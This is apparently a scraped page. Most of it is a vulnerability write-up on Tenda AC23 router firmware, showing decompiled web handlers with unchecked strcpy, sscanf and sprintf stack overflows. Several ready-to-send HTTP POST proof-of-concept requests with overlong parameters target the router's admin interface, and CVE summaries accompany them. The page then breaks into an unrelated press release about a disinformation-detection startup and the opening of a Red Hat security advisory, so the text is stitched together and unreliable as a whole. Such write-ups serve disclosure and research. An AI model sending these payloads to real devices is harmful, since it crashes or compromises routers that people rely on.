Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function.

**ac23**

版本信息：V16.03.07.45\_cn

**fromSetSysTime→sub\_496104→strcpy((char \*)v6, s);**

if ( !strcmp(v20, "sync") )
  {
    v19 = sub\_496104(a1);
    v14 = sub\_4C9C40(v19);
  }

int \_\_fastcall sub\_496104(int a1)
{
  int v2; // \[sp+1Ch\] \[+1Ch\]
  int v3; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v5; // \[sp+28h\] \[+28h\]
  \_\_int16 v6\[8\]; // \[sp+2Ch\] \[+2Ch\] BYREF
  \_WORD v7\[8\]; // \[sp+3Ch\] \[+3Ch\] BYREF
  int v8\[2\]; // \[sp+4Ch\] \[+4Ch\] BYREF
  int v9\[5\]; // \[sp+54h\] \[+54h\] BYREF

  v5 = 0;
  v6\[0\] = 48;
  v6\[1\] = 0;
  v6\[2\] = 0;
  v6\[3\] = 0;
  v6\[4\] = 0;
  v6\[5\] = 0;
  v6\[6\] = 0;
  v6\[7\] = 0;
  strcpy((char \*)v7, "0");
  v7\[1\] = 0;
  v7\[2\] = 0;
  v7\[3\] = 0;
  v7\[4\] = 0;
  v7\[5\] = 0;
  v7\[6\] = 0;
  v7\[7\] = 0;
  v8\[0\] = 0;
  v8\[1\] = 0;
  v9\[0\] = 0;
  v9\[1\] = 0;
  v9\[2\] = 0;
  v9\[3\] = 0;
  s = (char \*)websGetVar(a1, "timeZone", &unk\_4DDAE4);
  v3 = websGetVar(a1, "timePeriod", &unk\_4DDAE4);
  v2 = websGetVar(a1, "ntpServer", "time.windows.com");
  if ( strchr(s, ':') )
  {
    sscanf(s, "%\[^:\]:%s", v6, v7);//stack overflow
  }
  else
  {
    strcpy((char \*)v6, s);
    strcpy((char \*)v7, "0");
  }
  SetValue("sys.timesyn", "1");
  SetValue("sys.timemode", "auto");
  SetValue("sys.timezone", v6);
  SetValue("sys.timenextzone", v7);
  SetValue("sys.timefixper", v3);
  SetValue("sys.timentpserver", v2);
  if ( !CommitCfm() )
    return 1;
  GetValue("sys.timesyn", v8);
  if ( atoi((const char \*)v8) == 1 )
    sprintf((char \*)v9, "op=%d", 3);
  else
    sprintf((char \*)v9, "op=%d", 2);
  send\_msg\_to\_netctrl(24, v9);
  return v5;
}

**poc**

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 787
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.6878395284342707&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251mzhcvb
Connection: close

timeType=sync&timePeriod=86400&ntpServer=time.windows.com&timeZone=aa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&time=2000-01-01%2023%3A39%3A00

**formSetDeviceName→set\_device\_name→sprintf(v4, "%s;1", a1);**

int \_\_fastcall formSetDeviceName(int a1)
{
  int result; // $v0
  int v2; // \[sp+18h\] \[+18h\]
  const char \*v3; // \[sp+1Ch\] \[+1Ch\]
  const char \*v4; // \[sp+20h\] \[+20h\]
  int v5\[9\]; // \[sp+24h\] \[+24h\] BYREF

  v5\[0\] = 0;
  v5\[1\] = 0;
  v5\[2\] = 0;
  v5\[3\] = 0;
  v5\[4\] = 0;
  v5\[5\] = 0;
  v5\[6\] = 0;
  v5\[7\] = 0;
  v2 = 0;
  v4 = (const char \*)websGetVar(a1, "mac", &unk\_4DEB84);
  v3 = (const char \*)websGetVar(a1, "devName", &unk\_4DEB84);
  if ( set\_device\_name(v3, v4) )//stack\_overflow
  {
    sprintf((char \*)v5, "{\\"errCode\\":%d}", 1);
    result = websTransfer(a1, (const char \*)v5);
  }
  else
  {
    if ( !CommitCfm() )
      v2 = 1;
    sprintf((char \*)v5, "{\\"errCode\\":%d}", v2);
    result = websTransfer(a1, (const char \*)v5);
  }
  return result;
}

set\_device\_name

sprintf(v3, "client.devicename%s", (const char \*)v5);
sprintf(v4, "%s;1", a1);
SetValue(v3, v4);

**poc**

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.0.1
Content-Length: 264
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.9865714904007963&
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**setSchedWifi→ strcpy((char \*)ptr + 2, v8)**

int \_\_fastcall setSchedWifi(int a1)
{
  int v1; // $v0
  void \*ptr; // \[sp+30h\] \[+30h\]
  int i; // \[sp+34h\] \[+34h\]
  char \*s; // \[sp+38h\] \[+38h\]
  char \*nptr; // \[sp+3Ch\] \[+3Ch\]
  const char \*v7; // \[sp+40h\] \[+40h\]
  const char \*v8; // \[sp+44h\] \[+44h\]
  char \*v9; // \[sp+48h\] \[+48h\]
  int v10; // \[sp+4Ch\] \[+4Ch\]
  int v11; // \[sp+50h\] \[+50h\]
  int v12\[2\]; // \[sp+54h\] \[+54h\] BYREF
  int v13; // \[sp+5Ch\] \[+5Ch\] BYREF
  int v14; // \[sp+60h\] \[+60h\] BYREF
  int v15; // \[sp+64h\] \[+64h\] BYREF
  int v16; // \[sp+68h\] \[+68h\] BYREF
  int v17; // \[sp+6Ch\] \[+6Ch\] BYREF
  int v18; // \[sp+70h\] \[+70h\] BYREF
  int v19; // \[sp+74h\] \[+74h\] BYREF
  char v20\[256\]; // \[sp+78h\] \[+78h\] BYREF
  char v21\[256\]; // \[sp+178h\] \[+178h\] BYREF

  v11 = 1;
  v10 = 1;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v13 = 1;
  v14 = 1;
  v15 = 1;
  v16 = 1;
  v17 = 1;
  v18 = 1;
  v19 = 1;
  i = 0;
  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  v9 = (char \*)websGetVar(a1, "schedWifiEnable", "1");
  v8 = (const char \*)websGetVar(a1, "schedStartTime", &unk\_4D7C58);
  v7 = (const char \*)websGetVar(a1, "schedEndTime", &unk\_4D7C58);
  nptr = (char \*)websGetVar(a1, "timeType", "0");
  s = (char \*)websGetVar(a1, "day", "1,1,1,1,1,1,1");
  v1 = wifi\_get\_mibname("wlan", "enable", v20);
  GetValue(v1, v12);
  if ( !LOBYTE(v12\[0\]) )
    strcpy((char \*)v12, "1");
  if ( atoi(nptr) )
    sscanf(s, "%d,%d,%d,%d,%d,%d,%d", &v13, &v14, &v15, &v16, &v17, &v18, &v19);
  SetValue("sys.sched.wifi.timeType", nptr);
  ptr = malloc(0x19u);
  v10 = atoi(v9);
  if ( ptr )
  {
    \*(\_BYTE \*)ptr = atoi((const char \*)v12) != 0;
    \*((\_BYTE \*)ptr + 1) = atoi(v9) != 0;
    strcpy((char \*)ptr + 2, v8);
    strcpy((char \*)ptr + 10, v7);
    for ( i = 0; i < 7; ++i )
      \*((\_BYTE \*)ptr + i + 18) = \*(&v13 + i) != 0;
    sub\_461D5C(ptr, 0);
    free(ptr);
    v11 = 0;
  }
  CommitCfm();
  if ( v10 )
  {
    sprintf(v21, "op=%d", 1);
    send\_msg\_to\_netctrl(62, v21);
    v11 = 0;
  }
  websWrite(
    a1,
    "HTTP/1.1 200 OK\\nContent-type: text/plain; charset=utf-8\\nPragma: no-cache\\nCache-Control: no-cache\\n\\n");
  websWrite(a1, "{\\"errCode\\":%d}", v11);
  return websDone(a1, 200);
}

**poc**

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.0.1
Content-Length: 102
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aoccvb
Connection: close

schedWifiEnable=1&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&schedEndTime=07%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

**fromSetWirelessRepeat→sub\_45CD64→sub\_45CAD8→sub\_45BB10**

if ( strcmp(v14, "none") )
  {
    if ( strcmp(v14, "wpapsk") )
      return -1;
    v13 = (char \*)websGetVar(a1, "wpapsk\_type", "wpa&wpa2");
    v12 = (char \*)websGetVar(a1, "wpapsk\_crypto", "aes");
    s = (char \*)websGetVar(a1, "wpapsk\_key", &unk\_4D72FC);
    if ( !\*s && strlen(s) < 8 )
      return -1;
    if ( !strcmp(v13, "wpa") )
    {
      strcpy(v20, "psk");
    }
    else if ( !strcmp(v13, "wpa2") )
    {
      strcpy(v20, "psk2");
    }
    else
    {
      strcpy(v20, "psk+psk2");
    }
    if ( !strcmp(v12, "tkip&aes") )
      strcpy(v21, "tkip+aes");
    else
      strcpy(v21, v12);
    v6 = wifi\_get\_mibname(a3, "extend\_wpapsk\_type", v18);
    SetValue(v6, v20);
    v7 = wifi\_get\_mibname(a3, "extend\_wpapsk\_crypto", v18);
    SetValue(v7, v21);
    v8 = wifi\_get\_mibname(a3, "extend\_wpapsk\_key", v18);
    SetValue(v8, s);
  }

**poc**

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 247
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251fsacvb
Connection: close

wifi\_chkHz=1&wl\_mode=wisp&wl\_enbale=1&country\_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk\_key=11111111&security=wpapsk&wpapsk\_type=wpa&wpapsk\_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

**fromSetWifiGusetBasic**

\_\_src = (char \*)websGetVar(param\_1,"shareSpeed",&DAT\_004d83a0);
  strcpy((char \*)&local\_124,\_\_src);

**poc**

POST /goform/WifiGuestSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 531
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251tyacvb
Connection: close

guestEn=1&guestEn\_5g=1&guestSecurity=wpapsk&guestSecurity\_5g=wpapsk&guestSsid=Tenda\_VIP&guestSsid\_5g=Tenda\_VIP\_5G&guestWrlPwd=11111111&guestWrlPwd\_5g=11111111&effectiveTime=8&shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**formSetQosBand**

formSetQosBand→set\_qosMib\_list→strcpy(v8, s);

int \_\_fastcall formSetQosBand(int a1)
{
int v2; // \[sp+30h\] \[+30h\]
int v3\[8\]; // \[sp+34h\] \[+34h\] BYREF
char v4\[256\]; // \[sp+54h\] \[+54h\] BYREF
int v5\[8\]; // \[sp+154h\] \[+154h\] BYREF
int v6\[8\]; // \[sp+174h\] \[+174h\] BYREF
int v7\[5\]; // \[sp+194h\] \[+194h\] BYREF

v3\[0\] = 0;
v3\[1\] = 0;
v3\[2\] = 0;
v3\[3\] = 0;
v3\[4\] = 0;
v3\[5\] = 0;
v3\[6\] = 0;
v3\[7\] = 0;
memset(v4, 0, sizeof(v4));
v2 = websGetVar(a1, "list", &unk\_4DEB84);
unSetQosOldMiblist();
set\_qosoldMib\_list();
unSetQosMiblist();
set\_qosMib\_list(v2, 10);

int \_\_fastcall set\_qosMib\_list(const char \*a1, char a2)
{
  char \*v2; // $v0
  char \*s; // \[sp+24h\] \[+24h\]
  const char \*v5; // \[sp+28h\] \[+28h\]
  int v6; // \[sp+2Ch\] \[+2Ch\]
  int v7; // \[sp+30h\] \[+30h\] BYREF
  char v8\[256\]; // \[sp+34h\] \[+34h\] BYREF
  int v9; // \[sp+134h\] \[+134h\] BYREF
  int v10; // \[sp+138h\] \[+138h\]
  int v11\[8\]; // \[sp+13Ch\] \[+13Ch\] BYREF
  int v12\[4\]; // \[sp+15Ch\] \[+15Ch\] BYREF
  int v13\[4\]; // \[sp+16Ch\] \[+16Ch\] BYREF
  char v14\[256\]; // \[sp+17Ch\] \[+17Ch\] BYREF
  int v15; // \[sp+27Ch\] \[+27Ch\]
  int v16; // \[sp+280h\] \[+280h\]
  int v17; // \[sp+284h\] \[+284h\]
  int v18; // \[sp+288h\] \[+288h\]

  v7 = 0;
  memset(v8, 0, sizeof(v8));
  v9 = 0;
  v10 = 0;
  v11\[0\] = 0;
  v11\[1\] = 0;
  v11\[2\] = 0;
  v11\[3\] = 0;
  v11\[4\] = 0;
  v11\[5\] = 0;
  v11\[6\] = 0;
  v11\[7\] = 0;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v12\[2\] = 0;
  v12\[3\] = 0;
  v13\[0\] = 0;
  v13\[1\] = 0;
  v13\[2\] = 0;
  v13\[3\] = 0;
  memset(v14, 0, sizeof(v14));
  s = (char \*)a1;
  v2 = strchr(a1, a2);
  while ( v2 )
  {
    v6 = 0;
    \*v2 = 0;
    v5 = v2 + 1;
    memset(v8, 0, sizeof(v8));
    strcpy(v8, s);
    if ( v8\[0\] == 59 )
    {
      sscanf(v8, ";%\[^;\];%\[^;\];%\[^;\];%\[^;\];", &v9, v11, v13, v12);
    }
    else
    {
      sscanf(v8, "%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s", v14, v11, v13, v12);
      v6 = 1;
    }
    if ( atoi((const char \*)v13) || atoi((const char \*)v12) )
    {
      if ( v6 == 1 )
        set\_device\_name(v14, v11);

这个参数长度不加以限制还会影响set\_device\_name

**poc**

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.0.1
Content-Length: 791
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/net\_control.html?random=0.0444079600832199&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aticvb
Connection: close

list=DESKTOP-V29RD1268aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:77:24:54:a9:c000
Unknownaaaaaaaaaaaaaaaaaaaaaaaaaaaaunknown00

**setSmartPowerManagement**

    nptr = (char \*)websGetVar(a1, "powerSavingEn", "0");
  s = (char \*)websGetVar(a1, "time", "00:00-7:30");
  v4 = websGetVar(a1, "powerSaveDelay", "1");
  v3 = (char \*)websGetVar(a1, "ledCloseType", "allClose");
  if ( nptr && s && v4 && v3 )
  {
    sscanf(s, "%\[^:\]:%\[^-\]-%\[^:\]:%s", v7, v8, v9, v10);
    sprintf(v11, "%s:%s", (const char \*)v7, (const char \*)v8);
    sprintf(v12, "%s:%s", (const char \*)v9, (const char \*)v10);
    GetValue("sys.sched.led.closetype", v13);

**poc**

POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 803
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/sleep\_mode.html?random=0.7222154127483253&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251csvcvb
Connection: close

powerSavingEn=1&time=0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0%3A00-07%3A00&ledCloseType=allClose&powerSaveDelay=1

**formSetFirewallCfg**

int \_\_fastcall formSetFirewallCfg(int a1)
{
  int v1; // $a1
  int v2; // $a2
  \_BOOL4 v4; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v6\[2\]; // \[sp+28h\] \[+28h\] BYREF
  char v7\[64\]; // \[sp+30h\] \[+30h\] BYREF
  int v8\[2\]; // \[sp+70h\] \[+70h\] BYREF
  char v9\[64\]; // \[sp+78h\] \[+78h\] BYREF

  v6\[0\] = 0;
  v6\[1\] = 0;
  memset(v7, 0, sizeof(v7));
  v8\[0\] = 0;
  v8\[1\] = 0;
  memset(v9, 0, sizeof(v9));
  s = (char \*)websGetVar(a1, "firewallEn", "1111");
  if ( strlen(s) \>\= 4 )
  {
    strcpy((char \*)v6, s);

**poc**

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 764
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/firewall.html?random=0.3855955678045606&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251izccvb
Connection: close

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-43101: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the timeZone parameter in the fromSetSysTime function.

CVE-2022-43102: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the schedStartTime parameter in the setSchedWifi function.

CVE-2022-43106: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the list parameter in the formSetQosBand function.

CVE-2022-43103: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the firewallEn parameter in the formSetFirewallCfg function.

CVE-2022-43108: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the time parameter in the setSmartPowerManagement function.

CVE-2022-43107: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Investment to advance efforts to detect and mitigate disinformation.

**WASHINGTON and SAN FRANCISCO, Nov. 2, 2022 /PRNewswire/ —** Alethea, a technology company that detects and mitigates disinformation, misinformation, and social media manipulation, raised $10 million Series A, led by Ted Schleinand Kevin Mandia of Ballistic Ventures.

Proceeds will be invested into Alethea's machine learning SaaS platform, Artemis (in closed beta), by growing its engineering and data science teams. Currently in use by household name brands, Artemis conducts multichannel analysis across billions of datapoints to identify disinformation and social media manipulation at its start. As a result, communicators and risk and intelligence teams have the insights they need to protect their brands, bottom lines, and market cap.

"Disinformation is the next iteration of information security, and communicators and risk professionals are on the front lines of protecting their organizations from the information that exists outside their systems," said Lisa Kaplan, Founder and CEO of Alethea. "We've earned our record of alerting customers to the unknown unknowns to help avoid crises. Our incident response capabilities during high-stress periods, such as short-seller attacks, protects our customers. To provide this protection at scale, we created the system that didn't exist – Artemis – to provide tailored insights into the disinformation, misinformation, and social media manipulation ecosystem."

"We have found the right partners with Ted, Kevin, and the Ballistic network to deliver this capability at scale. With the ability to operate in free economies and democracies at stake, we look forward to rapidly scaling our support to customers as they navigate the new digital reality," continued Kaplan.

"Alethea is on the cutting edge of the fight against misinformation, one of the biggest threats to our modern society," said Ted Schlein, Chairman and General Partner of Ballistic Ventures. "We invested in the company because we believe Alethea's proven technology is critical to helping corporations promote access to accurate information and a more secure world."

Alethea was represented by outside counsel, WilmerHale, in the transaction.

**About Ballistic Ventures**

Ballistic Ventures is a venture capital firm solely dedicated to early-stage cybersecurity and cyber-related companies. The founding partners, Kevin Mandia, Barmak Meftah, Ted Schlein, Jake Seid, and Roger Thornton, have spent their entire careers defending against every cyber threat conceivable. Collectively, they have founded, funded, and operated over 90 successful cybersecurity firms, led over 10,000 security professionals globally, and have 40+ years of experience in venture capital. Learn more at ballisticventures.com.

**About Alethea**

Alethea is a technology company helping the Fortune 500, private companies and nonprofits protect themselves from harms stemming from disinformation. Leveraging its multi-channel machine learning platform, Artemis, Alethea detects disinformation narratives across the internet, enabling customers to proactively defend against this pervasive threat. With Artemis-powered early detection, Alethea customers can protect their reputations, key assets, physical safety and market value. The company was founded in 2019 and is woman-owned. Learn more at www.aletheagroup.com.

Alethea Closes $10M Series A Financing Led by Ballistic Ventures

Red Hat Security Advisory 2022-7216-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.51. Issues addressed include code execution and memory leak vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.9.51 bug fix and security update  
Advisory ID:       RHSA-2022:7216-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7216  
Issue date:        2022-11-03  
CVE Names:         CVE-2021-45485 CVE-2021-45486 CVE-2022-2588  
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166  
                   CVE-2022-21618 CVE-2022-21619 CVE-2022-21624  
                   CVE-2022-21626 CVE-2022-21628 CVE-2022-26945  
                   CVE-2022-30321 CVE-2022-30322 CVE-2022-30323  
                   CVE-2022-39399  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.9.51 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.51

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.9.51. See the following advisory for the RPM packages for this  
release:

